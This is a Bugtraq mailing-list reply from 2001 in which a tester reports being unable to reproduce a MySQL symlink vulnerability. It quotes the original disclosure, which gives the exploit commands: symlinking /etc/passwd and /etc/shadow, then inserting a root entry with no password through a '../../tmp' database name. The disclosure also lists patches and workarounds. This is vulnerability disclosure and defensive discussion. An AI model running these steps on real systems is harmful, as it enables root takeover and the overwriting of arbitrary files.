Bugtraq mailing list archives
Re: potential vulnerability of mysqld running with root privileges
From: "Ryan W. Maple" <ryan () GUARDIANDIGITAL COM>
Date: Tue, 20 Mar 2001 12:38:29 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I was unable to reproduce this with MySQL 3.22.32. Here is a transcript: [rwm@tester tmp]$ rpm -q MySQL MySQL-3.22.32-1.0.8 [rwm@tester tmp]# ps auxwww | grep mysql | grep ^root | wc -l 4 [rwm@tester /root]# ls -la /var/tmp/qqq.ISD lrwxrwxrwx 1 rwm admin 12 Mar 20 08:46 /var/tmp/gotcha.ISD -> /root/GOTCHA "test" is a user I created with full access (all 'Y's in mysql.user): [rwm@tester rwm]$ mysql -utest -ptest00 '../../tmp' Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 4 to server version: 3.22.32 Type 'help' for help. mysql> CREATE TABLE gotcha(qqq VARCHAR(255)); ERROR 1: Can't create/write to file '/var/tmp/gotcha.ISD' (Errcode: 13) mysql> INSERT INTO gotcha VALUES ("I just owned you"); Query OK, 1 row affected (0.00 sec) The file still contains my original string, insted of what I INSERT'd: [root@webtool /root]# cat /root/GOTCHA This is a test of the MySQL exploit. :) 3.20 is terribly old. I would recommend upgrading anyway. And for the record, Red Hat 7.0 ships with a user/group 'mysql' under which the daemon runs (I guess they read up, not sure what version of the MySQL RPM you saw it running as root under...). Cheers, Ryan +-- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --+ Ryan W. Maple Guardian Digital, Inc. "If you eliminate the redundancy, sleep is a four letter word." -CW +-- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --+ On Sun, 18 Mar 2001, Pavlov, Lesha wrote:
Anybody, who get login and password to mysql can use it as DoS or r00t exploit because mysql accepts '../blah-blah' as valid database name and each table represented by 3 files tablename.ISD, tablename.ISM and tablename.frm, But, when mysqld checks table already exists or not exists, it checks _only_ tablename.frm : Usage this "vulnerable features of mysql" to make big DoS (Will Overwrite any file you wish): $ cd /var/tmp $ ln -s /some/file/you/wish/to/owerwrite qqq.ISD $ mysql -u user -h localhost -p somepassword '../../tmp' create table qqq(www int); \q $ File /some/file/you/wish/to/overwrite will be overwritten. Usage as r00t exploit: $ cd /var/tmp $ ln -s /etc/passwd gotcha.ISD $ ln -s /etc/shadow make_me_r00t.ISD $ mysql -u user -h localhost -p somepassword '../../tmp' create table gotcha(qqq varchar(255)); create table make_me_r00t(qqq varchar(255)); insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n'); insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n'); \q $ You getta r00t now! Recomendations: * Patch mysql to when check table presents, it checks all tablename.{ISD,ISM,frm} files, not only tablename.frm * Patch mysql to treat database names, started by '..' as incorrect database names. * And Main recomendation - do not run mysqld as root!!! Patches: not yet Workaround: chowns existing database tables to a normal user and run mysqld as this unprivileged user - it will be better solution!. Vulnerable versions: This DoS/exploit tested on mysql-3.20.32a but i see another versions of mysql also vulnerabile. Comments: Mysql dox recomends dont run mysqld as root, but People from RedHat didnt read mysql dox - mysql istalled from rpm is vulnerable.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6t5WYIwAIA9MpKWcRAk04AKCE0CzjndBm0Bf8nFIDKaR+vNuoIgCgui5C jTDW6IcIp8eYqTbXEdVwCYA= =6vd3 -----END PGP SIGNATURE-----
Current thread:
- Re: potential vulnerability of mysqld running with root privileges Ryan W. Maple (Mar 21)